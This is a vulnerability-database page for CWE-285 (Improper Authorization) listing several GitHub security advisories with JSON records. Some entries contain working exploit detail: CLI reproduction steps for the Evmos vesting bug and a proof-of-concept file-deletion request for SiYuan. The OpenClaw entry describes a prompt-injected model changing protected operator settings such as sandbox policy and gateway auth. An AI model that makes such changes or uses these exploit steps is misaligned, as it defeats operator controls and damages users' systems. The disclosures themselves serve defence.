Common Weakness Enumeration

CWE-285

Discouraged

Improper Authorization

Abstraction: Class · Status: Draft

The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

2310 vulnerabilities reference this CWE, most recent first.

GHSA-7H57-MJ3H-9R35

Vulnerability from github – Published: 2025-11-03 09:30 – Updated: 2025-11-03 09:30
VLAI
Details

A vulnerability was identified in fushengqian fuint up to 41e26be8a2c609413a0feaa69bdad33a71ae8032. Affected by this issue is some unknown functionality of the file fuint-application/src/main/java/com/fuint/module/clientApi/controller/ClientSignController.java of the component Authentication Token Handler. Such manipulation leads to authorization bypass. The attack may be launched remotely. Attacks of this nature are highly complex. The exploitation is known to be difficult. The exploit is publicly available and might be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12623"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-03T08:15:33Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was identified in fushengqian fuint up to 41e26be8a2c609413a0feaa69bdad33a71ae8032. Affected by this issue is some unknown functionality of the file fuint-application/src/main/java/com/fuint/module/clientApi/controller/ClientSignController.java of the component Authentication Token Handler. Such manipulation leads to authorization bypass. The attack may be launched remotely. Attacks of this nature are highly complex. The exploitation is known to be difficult. The exploit is publicly available and might be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases.",
  "id": "GHSA-7h57-mj3h-9r35",
  "modified": "2025-11-03T09:30:38Z",
  "published": "2025-11-03T09:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12623"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fushengqian/fuint/issues/67"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.330915"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.330915"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.678911"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-7HRH-V6WP-53VW

Vulnerability from github – Published: 2024-06-06 19:10 – Updated: 2024-10-15 23:34
VLAI
Summary
Evmos allows unvested token delegations
Details

Impact

What kind of vulnerability is it? Who is impacted?

At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via ClawbackVestingAccount.

Patches

Has the problem been patched? What versions should users upgrade to?

The PR linked to this advisory includes part of the fix. The remainder is in a second advisory on the Cosmos SDK fork.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.

References

Are there any links users can visit to find out more?

See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:

  1. Download vesting_setup.json with the following contents:
{
  "start_time": 1679602272,
  "periods": [
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 10 
    },
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 259200000
    }
  ]
}
  1. Run the following CLI commands to reproduce the issue locally:
evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes

# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

evmosd keys add key1 --recover --home ~/.tmp-evmosd
# Enter the following mnemonic
skate tell option purity cattle poverty street act bone govern way various

evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address

# Substitute the operator address from the previous query
# Note that this delegates 70% of the user's available stake
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Re-run the same command
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Note that the total delegations now exceed the user's vested balance
evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v18"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "18.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v17"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "17.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v16"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "16.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v15"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "15.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v14"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "14.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v13"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "13.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v12"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "12.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v11"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "11.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v10"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "10.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v9"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "9.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "8.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v7"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/evmos/evmos/v6"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "6.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-37154"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-06T19:10:21Z",
    "nvd_published_at": "2024-06-06T19:15:58Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAt the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via `ClawbackVestingAccount`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n[The PR linked to this advisory](https://github.com/evmos/evmos-ghsa-7hrh-v6wp-53vw/pull/1) includes part of the fix. The remainder is in a [second advisory on the Cosmos SDK fork](https://github.com/evmos/cosmos-sdk/security/advisories/GHSA-wj6f-x5wv-8pqv).\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nThere is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.\n\n### References\n_Are there any links users can visit to find out more?_\n\nSee the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:\n\n1. Download `vesting_setup.json` with the following contents:\n```\n{\n  \"start_time\": 1679602272,\n  \"periods\": [\n    {\n      \"coins\": \"100000000000000000000aevmos\",\n      \"length_seconds\": 10 \n    },\n    {\n      \"coins\": \"100000000000000000000aevmos\",\n      \"length_seconds\": 259200000\n    }\n  ]\n}\n```\n\n2. Run the following CLI commands to reproduce the issue locally:\n```\nevmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes\n\n# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested\nevmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd\n\nevmosd keys add key1 --recover --home ~/.tmp-evmosd\n# Enter the following mnemonic\nskate tell option purity cattle poverty street act bone govern way various\n\nevmosd q staking validators --home ~/.tmp-evmosd | grep operator_address\n\n# Substitute the operator address from the previous query\n# Note that this delegates 70% of the user\u0027s available stake\nevmosd tx staking delegate \u003coperator_address\u003e 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes\n\n# Re-run the same command\nevmosd tx staking delegate \u003coperator_address\u003e 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes\n\n# Note that the total delegations now exceed the user\u0027s vested balance\nevmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd\n```",
  "id": "GHSA-7hrh-v6wp-53vw",
  "modified": "2024-10-15T23:34:18Z",
  "published": "2024-06-06T19:10:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/evmos/evmos/security/advisories/GHSA-7hrh-v6wp-53vw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37154"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/evmos/evmos"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2024-2904"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Evmos allows unvested token delegations"
}

GHSA-7JF5-P556-75PR

Vulnerability from github – Published: 2022-05-24 16:59 – Updated: 2022-12-06 21:35
VLAI
Summary
Jenkins Kubernetes CI/CD Plugin vulnerable to Credential Enumeration
Details

A missing permission check in Jenkins ElasticBox Jenkins Kubernetes CI/CD Plugin in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.

Note: Jenkins has suspended distribution of this plugin.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.elasticbox.jenkins-ci.plugins:kubernetes-ci"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-10470"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-276",
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-12-06T21:35:55Z",
    "nvd_published_at": "2019-10-23T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A missing permission check in Jenkins ElasticBox Jenkins Kubernetes CI/CD Plugin in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.\n\n## Note: Jenkins has suspended distribution of this plugin.",
  "id": "GHSA-7jf5-p556-75pr",
  "modified": "2022-12-06T21:35:55Z",
  "published": "2022-05-24T16:59:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10470"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/kubernetes-ci-plugin"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1005%20(2)"
    },
    {
      "type": "WEB",
      "url": "https://plugins.jenkins.io/kubernetes-ci"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2019/10/23/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Jenkins Kubernetes CI/CD Plugin vulnerable to Credential Enumeration"
}

GHSA-7JM2-G593-4QRC

Vulnerability from github – Published: 2026-04-25 23:51 – Updated: 2026-04-25 23:51
VLAI
Summary
OpenClaw: Agent gateway config mutations could change protected operator settings
Details

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected versions: < 2026.4.20
  • Patched version: 2026.4.20

Impact

The agent-facing gateway config.patch / config.apply guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.

This is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium.

Fix

OpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.

Fix commit:

  • fe30b31a97a917ecc6e92f6c85378b6b20352422

Release

Fixed in OpenClaw 2026.4.20.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.4.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1220",
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-25T23:51:11Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `\u003c 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.\n\nThis is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.\n\nFix commit:\n\n- `fe30b31a97a917ecc6e92f6c85378b6b20352422`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
  "id": "GHSA-7jm2-g593-4qrc",
  "modified": "2026-04-25T23:51:11Z",
  "published": "2026-04-25T23:51:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Agent gateway config mutations could change protected operator settings"
}

GHSA-7JRR-347F-8GRX

Vulnerability from github – Published: 2025-07-18 18:30 – Updated: 2025-07-18 18:30
VLAI
Details

Improper authorization in Azure Machine Learning allows an authorized attacker to elevate privileges over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-49746"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-18T17:15:43Z",
    "severity": "CRITICAL"
  },
  "details": "Improper authorization in Azure Machine Learning allows an authorized attacker to elevate privileges over a network.",
  "id": "GHSA-7jrr-347f-8grx",
  "modified": "2025-07-18T18:30:29Z",
  "published": "2025-07-18T18:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49746"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49746"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7M5H-W69J-QGGG

Vulnerability from github – Published: 2026-04-10 19:32 – Updated: 2026-04-24 20:36
VLAI
Summary
SiYuan: Publish Reader Can Arbitrarily Delete Attribute View Files via `/api/av/removeUnusedAttributeView`
Details

Summary

An authenticated publish-service reader can invoke /api/av/removeUnusedAttributeView and cause persistent deletion of arbitrary attribute view (AV) definition files from the workspace.

The route is protected only by generic CheckAuth, which accepts publish RoleReader requests. The handler forwards a caller-controlled id directly into a model function that deletes data/storage/av/<id>.json without verifying either:

  • that the caller is allowed to perform write/destructive actions; or
  • that the target AV is actually unused.

This is a persistent integrity and availability issue reachable from the publish surface.

Root Cause

1. Publish users are issued a RoleReader JWT

ClaimsKeyRole: RoleReader,

2. The publish reverse proxy forwards that token upstream

3. CheckAuth accepts RoleReader

if role := GetGinContextRole(c); IsValidRole(role, []Role{
    RoleAdministrator,
    RoleEditor,
    RoleReader,
}) {
    c.Next()
    return
}

4. The route is exposed with CheckAuth only

ginServer.Handle("POST", "/api/av/removeUnusedAttributeView", model.CheckAuth, removeUnusedAttributeView)

There is no CheckAdminRole and no CheckReadonly.

5. The handler forwards attacker-controlled id directly to the delete sink

avID := arg["id"].(string)
model.RemoveUnusedAttributeView(avID)

6. The model deletes the AV file unconditionally

func RemoveUnusedAttributeView(id string) {
    absPath := filepath.Join(util.DataDir, "storage", "av", id+".json")
    if !filelock.IsExist(absPath) {
        return
    }
    ...
    if err = filelock.RemoveWithoutFatal(absPath); err != nil {
        ...
        return
    }
    IncSync()
}

Crucially, this function does not verify that the supplied AV is actually unused. The name of the function suggests a cleanup helper, but the implementation is really "delete AV file by id if it exists".

Attack Prerequisites

  • Publish service enabled
  • Attacker can access the publish service
  • If publish auth is enabled, attacker has valid publish-reader credentials
  • Attacker knows an avID

Obtaining avID

avID is not secret. It is exposed extensively in frontend markup as data-av-id.

Examples:

Any publish-visible database/attribute view can therefore disclose a valid avID to the attacker.

Exploit Path

  1. Attacker browses published content containing an attribute view.
  2. Attacker extracts the data-av-id value from the page/DOM.
  3. Attacker sends a POST request to /api/av/removeUnusedAttributeView through the publish service.
  4. Publish proxy injects a valid RoleReader token.
  5. CheckAuth accepts the request.
  6. The handler passes the attacker-controlled avID to model.RemoveUnusedAttributeView.
  7. The backend deletes data/storage/av/<avID>.json.

Proof of Concept

Request:

POST /api/av/removeUnusedAttributeView HTTP/1.1
Host: <publish-host>:<publish-port>
Content-Type: application/json
Authorization: Basic <publish-account-creds-if-enabled>

{
  "id": "<exposed-data-av-id>"
}

Expected result:

  • HTTP 200
  • backend increments sync state
  • the target attribute view file is removed from data/storage/av/
  • published and local workspace behavior for that AV becomes broken until restored from history or recreated

Impact

This gives a low-privileged publish reader a destructive persistent write primitive against workspace data.

Practical consequences include:

  • deletion of live attribute view definitions
  • corruption/breakage of published database views
  • breakage of local workspace rendering and AV-backed relationships
  • operational disruption until restore or manual repair

The bug affects integrity and availability, not merely UI state.

Recommended Fix

At minimum:

  1. Block publish/read-only users from this route.
  2. Require admin/write authorization.
  3. Re-validate that the target AV is actually unused before deletion.

Safe router fix:

ginServer.Handle("POST", "/api/av/removeUnusedAttributeView",
    model.CheckAuth,
    model.CheckAdminRole,
    model.CheckReadonly,
    removeUnusedAttributeView,
)

And inside the model or handler, reject deletion unless the target id is present in UnusedAttributeViews(...).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260407035653-2f416e5253f1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40259"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T19:32:07Z",
    "nvd_published_at": "2026-04-16T23:16:33Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn authenticated publish-service reader can invoke `/api/av/removeUnusedAttributeView` and cause persistent deletion of arbitrary attribute view (`AV`) definition files from the workspace.\n\nThe route is protected only by generic `CheckAuth`, which accepts publish `RoleReader` requests. The handler forwards a caller-controlled `id` directly into a model function that deletes `data/storage/av/\u003cid\u003e.json` without verifying either:\n\n- that the caller is allowed to perform write/destructive actions; or\n- that the target AV is actually unused.\n\nThis is a persistent integrity and availability issue reachable from the publish surface.\n\n## Root Cause\n\n### 1. Publish users are issued a `RoleReader` JWT\n\n- [kernel/model/auth.go](/root/audit/siyuan/kernel/model/auth.go#L105)\n\n```go\nClaimsKeyRole: RoleReader,\n```\n\n### 2. The publish reverse proxy forwards that token upstream\n\n- [kernel/server/proxy/publish.go](/root/audit/siyuan/kernel/server/proxy/publish.go#L131)\n- [kernel/server/proxy/publish.go](/root/audit/siyuan/kernel/server/proxy/publish.go#L186)\n\n### 3. `CheckAuth` accepts `RoleReader`\n\n- [kernel/model/session.go](/root/audit/siyuan/kernel/model/session.go#L201)\n\n```go\nif role := GetGinContextRole(c); IsValidRole(role, []Role{\n    RoleAdministrator,\n    RoleEditor,\n    RoleReader,\n}) {\n    c.Next()\n    return\n}\n```\n\n### 4. The route is exposed with `CheckAuth` only\n\n- [kernel/api/router.go](/root/audit/siyuan/kernel/api/router.go#L507)\n\n```go\nginServer.Handle(\"POST\", \"/api/av/removeUnusedAttributeView\", model.CheckAuth, removeUnusedAttributeView)\n```\n\nThere is no `CheckAdminRole` and no `CheckReadonly`.\n\n### 5. The handler forwards attacker-controlled `id` directly to the delete sink\n\n- [kernel/api/av.go](/root/audit/siyuan/kernel/api/av.go#L32)\n\n```go\navID := arg[\"id\"].(string)\nmodel.RemoveUnusedAttributeView(avID)\n```\n\n### 6. The model deletes the AV file unconditionally\n\n- [kernel/model/attribute_view.go](/root/audit/siyuan/kernel/model/attribute_view.go#L49)\n\n```go\nfunc RemoveUnusedAttributeView(id string) {\n    absPath := filepath.Join(util.DataDir, \"storage\", \"av\", id+\".json\")\n    if !filelock.IsExist(absPath) {\n        return\n    }\n    ...\n    if err = filelock.RemoveWithoutFatal(absPath); err != nil {\n        ...\n        return\n    }\n    IncSync()\n}\n```\n\nCrucially, this function does **not** verify that the supplied AV is actually unused. The name of the function suggests a cleanup helper, but the implementation is really \"delete AV file by id if it exists\".\n\n## Attack Prerequisites\n\n- Publish service enabled\n- Attacker can access the publish service\n- If publish auth is enabled, attacker has valid publish-reader credentials\n- Attacker knows an `avID`\n\n## Obtaining `avID`\n\n`avID` is not secret. It is exposed extensively in frontend markup as `data-av-id`.\n\nExamples:\n\n- [app/src/protyle/render/av/render.ts](/root/audit/siyuan/app/src/protyle/render/av/render.ts#L117)\n- [app/src/protyle/render/av/layout.ts](/root/audit/siyuan/app/src/protyle/render/av/layout.ts#L120)\n- [app/src/protyle/render/av/groups.ts](/root/audit/siyuan/app/src/protyle/render/av/groups.ts#L52)\n\nAny publish-visible database/attribute view can therefore disclose a valid `avID` to the attacker.\n\n## Exploit Path\n\n1. Attacker browses published content containing an attribute view.\n2. Attacker extracts the `data-av-id` value from the page/DOM.\n3. Attacker sends a POST request to `/api/av/removeUnusedAttributeView` through the publish service.\n4. Publish proxy injects a valid `RoleReader` token.\n5. `CheckAuth` accepts the request.\n6. The handler passes the attacker-controlled `avID` to `model.RemoveUnusedAttributeView`.\n7. The backend deletes `data/storage/av/\u003cavID\u003e.json`.\n\n## Proof of Concept\n\nRequest:\n\n```http\nPOST /api/av/removeUnusedAttributeView HTTP/1.1\nHost: \u003cpublish-host\u003e:\u003cpublish-port\u003e\nContent-Type: application/json\nAuthorization: Basic \u003cpublish-account-creds-if-enabled\u003e\n\n{\n  \"id\": \"\u003cexposed-data-av-id\u003e\"\n}\n```\n\nExpected result:\n\n- HTTP 200\n- backend increments sync state\n- the target attribute view file is removed from `data/storage/av/`\n- published and local workspace behavior for that AV becomes broken until restored from history or recreated\n\n## Impact\n\nThis gives a low-privileged publish reader a destructive persistent write primitive against workspace data.\n\nPractical consequences include:\n\n- deletion of live attribute view definitions\n- corruption/breakage of published database views\n- breakage of local workspace rendering and AV-backed relationships\n- operational disruption until restore or manual repair\n\nThe bug affects integrity and availability, not merely UI state.\n\n## Recommended Fix\n\nAt minimum:\n\n1. Block publish/read-only users from this route.\n2. Require admin/write authorization.\n3. Re-validate that the target AV is actually unused before deletion.\n\nSafe router fix:\n\n```go\nginServer.Handle(\"POST\", \"/api/av/removeUnusedAttributeView\",\n    model.CheckAuth,\n    model.CheckAdminRole,\n    model.CheckReadonly,\n    removeUnusedAttributeView,\n)\n```\n\nAnd inside the model or handler, reject deletion unless the target `id` is present in `UnusedAttributeViews(...)`.",
  "id": "GHSA-7m5h-w69j-qggg",
  "modified": "2026-04-24T20:36:59Z",
  "published": "2026-04-10T19:32:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-7m5h-w69j-qggg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40259"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Publish Reader Can Arbitrarily Delete Attribute View Files via `/api/av/removeUnusedAttributeView`"
}

GHSA-7M8M-65VX-9R5X

Vulnerability from github – Published: 2025-08-15 09:31 – Updated: 2025-08-15 09:31
VLAI
Details

The Icons Factory plugin for WordPress is vulnerable to Arbitrary File Deletion due to insufficient authorization and improper path validation within the delete_files() function in all versions up to, and including, 1.6.12. This makes it possible for unauthenticated attackers to to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-7778"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-15T09:15:30Z",
    "severity": "CRITICAL"
  },
  "details": "The Icons Factory plugin for WordPress is vulnerable to Arbitrary File Deletion due to insufficient authorization and improper path validation within the delete_files() function in all versions up to, and including, 1.6.12. This makes it possible for unauthenticated attackers to to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).",
  "id": "GHSA-7m8m-65vx-9r5x",
  "modified": "2025-08-15T09:31:15Z",
  "published": "2025-08-15T09:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7778"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/icons-factory/tags/1.6.12/icons-factory.php#L1330"
    },
    {
      "type": "WEB",
      "url": "https://wordpress.org/plugins/icons-factory/#developers"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/24f31bbf-883f-4903-847a-7bfc3e45654c?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7MC4-JP4F-V2J2

Vulnerability from github – Published: 2023-01-14 09:30 – Updated: 2023-01-25 22:03
VLAI
Summary
Improper Authorization in grumpydictator/firefly-iii
Details

